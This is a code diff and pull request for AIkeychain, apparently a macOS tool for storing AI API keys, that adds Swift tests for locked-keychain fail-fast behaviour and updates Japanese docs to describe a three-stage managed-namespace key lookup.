+        // 空 recv 1 回で打ち切らず deadline まで待つ（並列テストの CPU 混雑で
+        // 応答が recv timeout を跨いで届く flake があった — streaming テストと同型）
         var resp = Data()
-        for _ in 0..<5 {
-            let chunk = client.recv(timeout: 3)
-            if chunk.isEmpty { break }
-            resp.append(chunk)
+        let respDeadline = Date().addingTimeInterval(10)
+        while Date() < respDeadline {
+            resp.append(client.recv(timeout: 2))
             if (String(data: resp, encoding: .utf8) ?? "").contains("\r\n\r\n") { break }
         }
         let respStr = String(data: resp, encoding: .utf8) ?? ""

--- a/Tests/AIkeychainTests/SecurityCLIKeychainServiceTests.swift
+++ b/Tests/AIkeychainTests/SecurityCLIKeychainServiceTests.swift
@@ -250,6 +250,26 @@ struct SecurityCLIKeychainServiceTests {
         ])
     }
 
+    @Test("A locked keychain fails fast without spawning and without quarantining (#170)")
+    func lockedKeychainFailsFast() throws {
+        let (service, stateDir) = try makeStub()
+        var locked = true
+        service.keychainLockedProbeForTesting = { locked }
+        try? service.save(value: "v", for: "LOCK_KEY") // 事前準備は不可（ロック中）
+
+        // 全エントリポイントが spawn せず即時 interactionRequired
+        #expect(throws: KeychainError.self) { try service.save(value: "v", for: "LOCK_KEY") }
+        #expect(throws: KeychainError.self) { _ = try service.retrieve(for: "LOCK_KEY") }
+        #expect(throws: KeychainError.self) { _ = try service.retrieveNoninteractive(for: "LOCK_KEY") }
+        #expect(throws: KeychainError.self) { try service.delete(for: "LOCK_KEY") }
+        #expect(callLog(stateDir).isEmpty) // security は一度も呼ばれない
+
+        // 解錠後は即座に使える（ロックは quarantine を残さない）
+        locked = false
+        try service.save(value: "v2", for: "LOCK_KEY")
+        #expect(try service.retrieveNoninteractive(for: "LOCK_KEY") == "v2")
+    }
+
     @Test("Delete propagates a legacy cleanup failure and leaves the managed copy intact")
     func deleteLegacyFailureIsPropagated() throws {
         let (service, stateDir) = try makeStub()

--- a/Tests/AIkeychainTests/SecurityCLIKeychainServiceTests.swift
+++ b/Tests/AIkeychainTests/SecurityCLIKeychainServiceTests.swift
@@ -2,8 +2,9 @@ import Testing
 import Foundation
 @testable import AIkeychain
 
-/// SecurityCLIKeychainService のテスト。実 Keychain には触れず、`security` を模す
-/// スタブスクリプト（npm CLI の cli/test と同じ発想）に差し替えて検証する。
+/// SecurityCLIKeychainService のテスト。実 Keychain のアイテムには触れず、`security`
+/// を模すスタブスクリプト（npm CLI の cli/test と同じ発想）と、ロック状態の
+/// テストプローブ（makeStub が { false } を注入）に差し替えて検証する。
 @Suite("SecurityCLIKeychainService Tests (stub security)")
 struct SecurityCLIKeychainServiceTests {
 
@@ -25,6 +26,7 @@ struct SecurityCLIKeychainServiceTests {
           acct=$(printf '%s' "$line" | sed -n 's/.*-a "\\([^"]*\\)".*/\\1/p')
           hex=$(printf '%s' "$line" | sed -n 's/.*-X \\([0-9a-fA-F]*\\).*/\\1/p')
           [ -n "$svc" ] && [ -n "$acct" ] && [ -n "$hex" ] || exit 1
+          echo "add $svc|$acct" >> "$dir/calls.log"
           mkdir -p "$dir/$svc"
           printf '%s' "$hex" | xxd -r -p > "$dir/$svc/$acct"
           exit 0
@@ -60,6 +62,10 @@ struct SecurityCLIKeychainServiceTests {
         try FileManager.default.setAttributes([.posixPermissions: 0o755], ofItemAtPath: stub.path)
         let service = SecurityCLIKeychainService()
         service.securityBinOverrideForTesting = stub.path
+        // 実ユーザーの keychain ロック状態に依存させない（ロック中のランナーで
+        // スイート全体が落ちる環境依存を防ぐ — #183 レビュー SF-1）。
+        // ロック挙動のテストだけがこのプローブを上書きする。
+        service.keychainLockedProbeForTesting = { false }
         return (service, dir.appendingPathComponent("state"))
     }
 
@@ -255,14 +261,24 @@ struct SecurityCLIKeychainServiceTests {
         let (service, stateDir) = try makeStub()
         var locked = true
         service.keychainLockedProbeForTesting = { locked }
-        try? service.save(value: "v", for: "LOCK_KEY") // 事前準備は不可（ロック中）
 
-        // 全エントリポイントが spawn せず即時 interactionRequired
-        #expect(throws: KeychainError.self) { try service.save(value: "v", for: "LOCK_KEY") }
-        #expect(throws: KeychainError.self) { _ = try service.retrieve(for: "LOCK_KEY") }
-        #expect(throws: KeychainError.self) { _ = try service.retrieveNoninteractive(for: "LOCK_KEY") }
-        #expect(throws: KeychainError.self) { try service.delete(for: "LOCK_KEY") }
-        #expect(callLog(stateDir).isEmpty) // security は一度も呼ばれない
+        // 全エントリポイントが spawn せず、正確に interactionRequired で即時失敗する
+        // （型だけの検証だと unexpectedStatus 経由の別ルートでも緑になり、Proxy の
+        // 503 写像を保証できない — #183 レビュー SF-5）
+        func expectInteractionRequired(_ body: () throws -> Void) {
+            do { try body(); Issue.record("expected interactionRequired, nothing thrown") }
+            catch KeychainError.interactionRequired {}
+            catch { Issue.record("expected interactionRequired, got \(error)") }
+        }
+        expectInteractionRequired { try service.save(value: "v", for: "LOCK_KEY") }
+        expectInteractionRequired { _ = try service.retrieve(for: "LOCK_KEY") }
+        expectInteractionRequired { _ = try service.retrieveNoninteractive(for: "LOCK_KEY") }
+        expectInteractionRequired { try service.delete(for: "LOCK_KEY") }
+        // stub は -i（書込）も含め全コマンドを記録する — save がガードを素通りして
+        // 書き込んでいれば calls.log と state ファイルに現れる
+        #expect(callLog(stateDir).isEmpty)
+        #expect(!FileManager.default.fileExists(
+            atPath: statePath(stateDir, service: SecurityCLIKeychainService.managedService, name: "LOCK_KEY").path))
 
         // 解錠後は即座に使える（ロックは quarantine を残さない）
         locked = false

--- a/Tests/AIkeychainTests/ViewModelTests.swift
+++ b/Tests/AIkeychainTests/ViewModelTests.swift
@@ -174,21 +174,21 @@ struct KeyListViewModelTests {
         #expect(discovered?.storage == .manual)
     }
 
-    @Test("Editing a manual-only (CLI-managed) key fails closed instead of poisoning (#177)")
-    func savingManualKeyFailsClosed() throws {
+    @Test("Editing a manual-only key writes a managed copy without touching the manual item (#170)")
+    func savingManualKeyWritesManagedCopy() throws {
+        // 旧 #177 の fail-closed は managed namespace 移行（C2/C3）で構造的に不要化:
+        // GUI の書込は subprocess security による managed への新規コピー作成であり、
+        // manual アイテム自体には触れない（毒化が起きない）。akc の解決順は
+        // managed が優先なので、新しい値が正しく勝つ。
         let (vm, mock) = makeSUT()
         let name = uniqueEnvName()
         mock.manualStore[name] = "old-value"
         vm.loadKeys()
         let discovered = try #require(vm.keys.first { $0.envVarName == name })
 
-        // in-process 編集は security 所有 manual アイテムを毒化するため拒否される。
-        #expect(throws: KeychainError.self) {
-            try vm.save(value: "new-value", for: discovered)
-        }
-        // 値は未変更（毒化も GUI 影コピーも起きない）
-        #expect(mock.manualStore[name] == "old-value")
-        #expect(mock.store[name] == nil)
+        try vm.save(value: "new-value", for: discovered)
+        #expect(mock.manualStore[name] == "old-value") // manual アイテムは無傷
+        #expect(mock.store[name] == "new-value")       // managed 相当に新コピー
     }
 
     @Test("Deleting a dual-scheme key removes both copies")

--- a/docs/design/architecture.md
+++ b/docs/design/architecture.md
@@ -91,7 +91,7 @@ sequenceDiagram
     participant API as AI API
 
     Shell->>Zshrc: source ~/.zshrc
-    Zshrc->>Security: security find-generic-password -s "com.aieo.aikeychain" -a "ANTHROPIC_API_KEY" -w
+    Zshrc->>Security: security find-generic-password -s "com.aieo.aikeychain.managed" -a "ANTHROPIC_API_KEY" -w
     Security->>Keychain: SecItemCopyMatching
     Keychain-->>Security: シークレット値
     Security-->>Zshrc: 値を返却
@@ -115,13 +115,13 @@ sequenceDiagram
     Zshrc->>Shell: export ANTHROPIC_API_KEY="keychain://ANTHROPIC_API_KEY"
     Shell->>Akc: akc run -- claude
     Akc->>Akc: env をスキャン (keychain:// プレフィックス検出 / collectRefs)
-    Note over Akc,Keychain: 2 段ルックアップ (resolveKey, issue #91)
-    Akc->>Security: ① security find-generic-password -s "com.aieo.aikeychain" -a "ANTHROPIC_API_KEY" -w
+    Note over Akc,Keychain: 3 段ルックアップ (resolveKey, issue #91/#167)
+    Akc->>Security: ① security find-generic-password -s "com.aieo.aikeychain.managed" -a "ANTHROPIC_API_KEY" -w
     Security->>Keychain: SecItemCopyMatching
-    alt GUI 保存形式で見つかった
+    alt managed namespace で見つかった
         Keychain-->>Akc: シークレット値
     else 見つからない (exit 44)
-        Akc->>Security: ② security find-generic-password -s "ANTHROPIC_API_KEY" -w (手動登録キー)
+        Akc->>Security: ② -s "com.aieo.aikeychain" -a "..."（旧 GUI ストア）→ ③ -s "ANTHROPIC_API_KEY"（手動登録キー）
         Security->>Keychain: SecItemCopyMatching
         Keychain-->>Akc: シークレット値
     end
@@ -129,7 +129,7 @@ sequenceDiagram
     Child->>API: curl -H "x-api-key: $ANTHROPIC_API_KEY"
 ```
 
-> **2 段ルックアップ（`resolveKey`）**: ① GUI 保存形式 `-s "com.aieo.aikeychain" -a "<KEY>"`（アカウント厳密一致）→ 見つからなければ ② 手動登録キー `-s "<KEY>"`（service 名のみ、`-a` は付けない）。手動登録キーは `acct` 値が一定しない（$USER / service 名）ため account を固定すると古い/無効な値を掴む恐れがあり、これを避ける（issue #91）。npm CLI（`cli/src/keychain.js`）・`scripts/akc`・GUI の `SetupManager.readSystemKeychainValue` はいずれも同一手順。
+> **3 段ルックアップ（`resolveKey` / v1.9+ #167）**: ① managed namespace `-s "com.aieo.aikeychain.managed" -a "<KEY>"`（akc/GUI の新規保存先）→ ② 旧 GUI ストア `-s "com.aieo.aikeychain" -a "<KEY>"` → ③ 手動登録キー `-s "<KEY>"`（service 名のみ、`-a` は付けない）。**各段は exit 44 (not found) のときだけ次へ落ちる** — それ以外の失敗は権威的として fail-closed（#147/#150）。手動登録キーは `acct` 値が一定しない（$USER / service 名）ため account を固定すると古い/無効な値を掴む恐れがあり、これを避ける（issue #91）。npm CLI（`cli/src/keychain.js`）と `scripts/akc` は同一手順。
 
 ### AI エージェント経由 (MCP + akc run)
 

--- a/docs/design/security.md
+++ b/docs/design/security.md
@@ -67,17 +67,27 @@ kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly
 - `ThisDeviceOnly` でデバイス間の漏洩リスクを排除
 :::
 
-### Keychain クエリ構成
+### Keychain 書き込み経路（v1.9+ / #167）
 
-```swift
-let query: [String: Any] = [
-    kSecClass as String:          kSecClassGenericPassword,
-    kSecAttrService as String:    "com.aieo.aikeychain",
-    kSecAttrAccount as String:    envVarName,     // "ANTHROPIC_API_KEY"
-    kSecValueData as String:      tokenData,       // UTF-8 encoded
-    kSecAttrAccessible as String: kSecAttrAccessibleAfterFirstUnlockThisDeviceOnly
-]
+::: danger シークレットの書き込みに in-process SecItem API を使わないこと
+GUI/CLI とも、ユーザーシークレットの書き込みは **subprocess `/usr/bin/security`
+（managed namespace `com.aieo.aikeychain.managed`）が唯一の経路**
+（`SecurityCLIKeychainService` / `cli/src/keychain.js`）。
+`SecItemAdd`/`SecItemUpdate` で書くと作成者がアプリになり、PartitionID の分離で
+`akc run` のヘッドレス読取がプロンプト/失敗する — C2/C3 (#169/#170) で排除した
+アーキテクチャの再生産になる。値は `security -i` の stdin + hex で渡し、
+argv・環境変数に露出させない（#94）。
+:::
+
+```bash
+# 実際の書き込み形（値は stdin 経由の hex。argv に出さない）
+/usr/bin/security -i <<'EOF'
+add-generic-password -U -s "com.aieo.aikeychain.managed" -a "ANTHROPIC_API_KEY" -X <hex>
+EOF
 ```
+
+例外はアプリ内部鍵（共有/署名鍵、`KeyShareService`）のみ: akc の読取対象ではなく、
+アプリだけが無音で読める in-process 所有が正しい。
 
 ## Secret Reference モードのセキュリティ
 

--- a/docs/guide/cli-mcp.md
+++ b/docs/guide/cli-mcp.md
@@ -29,10 +29,12 @@ npx aikeychain <command>
 
 ### ルックアップ順序
 
-bash 版 `scripts/akc` と互換（issue #91 対応済み）:
+bash 版 `scripts/akc` と互換（issue #91/#167 対応済み）。各段は exit 44
+(not found) のときだけ次へ落ちる（それ以外の失敗は fail-closed / #150）:
 
-1. `service="com.aieo.aikeychain"` + `account=<KEY>`（GUI ストア）
-2. `service=<KEY>` のみ・**account 非指定**（手動登録キー）
+1. `service="com.aieo.aikeychain.managed"` + `account=<KEY>`（managed namespace、v1.9+ の保存先）
+2. `service="com.aieo.aikeychain"` + `account=<KEY>`（旧 GUI ストア）
+3. `service=<KEY>` のみ・**account 非指定**（手動登録キー）
 
 ## MCP サーバー
 


### PR DESCRIPTION
Closes #170（親: #167）

## 概要
C2 (#169/PR #179) で GUI の secret 読み書きは subprocess `/usr/bin/security`（managed namespace）単一経路に切替済み。本 PR は C3 の残スコープ（[ギャップ分析コメント](https://github.com/aieo-product/AIkeychain/issues/170#issuecomment-5289841157)）を実装する。

## 変更
1. **旧 `KeychainService` クラス削除** — in-proc `SecItemAdd/Update/Delete` の secret 書込経路を物理的に排除。production 参照ゼロの dead code（全 default 注入は `SecurityCLIKeychainService.shared`）。`KeychainError.cliManaged` / #177 probe / Mock の fail-closed シミュレーションも撤去（managed 設計で毒化が構造的に不可能になったため）
2. **ロック即時検出** — subprocess 実行前に `SecKeychainGetStatus`（deprecated だが無音でロック状態を読める唯一の API）でロックを検出し、spawn せず `interactionRequired`。Proxy は既存写像で 503。quarantine には入れない（ロックはキー単位の状態でないため）
3. **KeyShareService はスコープ外と明記** — 共有秘密鍵/署名鍵はアプリ内部鍵で akc の読取対象でない。in-proc 所有が正しい（security 所有化すると E6-1 の 7 秒ブロックを自分が踏む）
4. stale コメント/テストの現行意味論への更新（manual-only キーの編集 = managed への新規コピー作成でありレガシー無傷、を検証するテストに置換）

## 実施しないこと（撤回/移管済み）
- `-U` → delete→fresh-add: **撤回**（spike S7' 実測で `-U` はヘッドレス読取を保つ）
- GUI での複数行/非 ASCII 許容 + hex デコード: **逆の決定が確定**（#179 B2、C7 #174 で規約化）
- キーチェーンピン留め → C9 #176 リスク受容 / 所有権反転の UI 明示 → C5 #172

## テスト
- Swift 187/187 pass × 2（ロック fail-fast の新テスト含む: 全エントリポイントが spawn ゼロで即時失敗し、解錠後は隔離なしで即復帰）
- CLI は変更なし（post-merge で 86/86 確認済み）

🤖 Generated with [Claude Code](https://claude.com/claude-code)

https://claude.ai/code/session_01PPwWFBAo9d5u87LAAUb6WM